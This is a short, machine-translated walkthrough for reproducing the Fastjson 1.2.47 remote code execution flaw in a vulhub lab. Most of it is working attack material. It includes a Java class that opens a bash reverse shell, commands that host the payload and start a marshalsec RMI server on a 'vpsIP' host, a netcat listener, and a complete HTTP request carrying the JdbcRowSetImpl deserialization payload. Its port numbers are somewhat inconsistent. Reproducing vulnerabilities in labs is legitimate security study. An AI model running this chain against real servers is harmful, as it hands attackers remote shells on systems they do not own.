Fastjson 1.2.47 does not com.sun.jndi.rmi.object.trustURLCodebase
have limitations in this version , so it caused this vulnerability. For specific analysis, please refer to the article
https://www.freebuf.com/vuls/208339.html
Prerequisites (avoid stepping on some pits)
Before reproducing this vulnerability, it is best to reproduce the deserialization of Fastjson 1.2.24, because the two vulnerability reproduction methods are very similar
1. It must be java 1.8 version, otherwise some commands cannot be compiled and executed, java -version view version
2. All tools and compiled packages must be in the same directory
marshalsec-0.0.3-SNAPSHOT-all.jar
Exploit.java
Exploit.class
Environment construction
https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
Build complete access to ip: port 8090
Recurrence reference
https://www.cnblogs.com/websecyw/p/11905014.html
https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
1. Get exp
git clone https://github.com/CaijiOrz/fastjson-1.2.47-RCE
In fact, this exp is a code that rebounds the shell
public class Exploit { public Exploit(){ try{ Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1"); }catch(Exception e){ e.printStackTrace(); } } public static void main(String[] argv){ Exploit e = new Exploit(); } }
2. vim Exploit.java modified to vpsIP and port
3.javac Exploit.java compiled into class file
4. python -m SimpleHTTPServer 4444 Open http service
5. java -cp marshalsec-0.0.3-SNAPSHOT-all.j marshalsec.jndi.RMIRefServer "http://vpsIP:4444/#Exploit" 9999
6. Monitor nc -lvnp 7777
7. Send POC, it will rebound and shell
I write the entire data packet, and directly modify the address and port of the red letter when it is used.
POST / HTTP/1.1 Host: 目标ip User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/json Content-Length: 264 { "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://vpsIP:9999/Exploit", "autoCommit":true } }
8. Successful rebound shell